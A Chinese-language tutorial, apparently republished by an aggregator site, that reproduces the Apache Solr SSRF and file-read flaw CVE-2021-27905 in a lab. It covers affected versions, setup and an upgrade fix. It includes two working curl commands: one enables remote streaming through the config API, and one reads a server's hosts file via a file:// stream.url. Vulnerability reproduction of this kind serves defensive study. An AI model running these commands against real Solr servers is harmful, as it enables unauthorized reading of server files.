Apache Solr SSRF 漏洞(CVE-2021-27905)复现
内容导读
互联网集市收集整理的这篇技术教程文章主要介绍了Apache Solr SSRF 漏洞(CVE-2021-27905)复现,小编现在分享给大家,供广大互联网技能从业者学习和参考。文章包含1230字,纯文字阅读大概需要2分钟。
内容图文
漏洞概述
Apache Solr是一个开源的搜索服务,使用Java编写、运行在Servlet容器的一个独立的全文搜索服务器,是Apache Lucene项目的开源企业搜索平台。
该漏洞是由于没有对输入的内容进行校验,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行SSRF攻击,最终造成任意读取服务器上的文件。
影响版本
Apache Solr <= 8.8.1
环境搭建
http://archive.apache.org/dist/lucene/solr/8.8.1/
解压完成后,进入bin目录,执行
solr start -p 8983
访问your-ip:8983即可看到页面
点击左侧的Core Admin来创建一个Core,可以发现报错
此时Solr已经在server/solr目录下已经创建了名字为new_core的文件夹,我们只需要把server/solr/configsets/default文件夹下的conf目录整个拷贝到new_core文件夹下,即可
此时即可创建成功
漏洞复现
通过http://192.168.1.103:8983/solr/admin/cores?indexInfo=false&wt=json可以看到core的名字
通过Solr提供的API可以开启远程开启文件流读取
curl -d '{ "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}' http://192.168.1.103:8983/solr/new_core/config -H 'Content-type:application/json'
读取本机的hosts的文件
curl "http://192.168.1.103:8983/solr/new_core/debug/dump?param=ContentStreams" -F "stream.url=file:///C:\Windows\System32\drivers\etc\hosts"
修复建议
升级到最新版本
下载地址:
https://solr.apache.org/downloads.html
内容总结
以上是互联网集市为您收集整理的Apache Solr SSRF 漏洞(CVE-2021-27905)复现全部内容,希望文章能够帮你解决Apache Solr SSRF 漏洞(CVE-2021-27905)复现所遇到的程序开发问题。 如果觉得互联网集市技术教程内容还不错,欢迎将互联网集市网站推荐给程序员好友。
内容备注
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 gblab@vip.qq.com 举报,一经查实,本站将立刻删除。
内容手机端
扫描二维码推送至手机访问。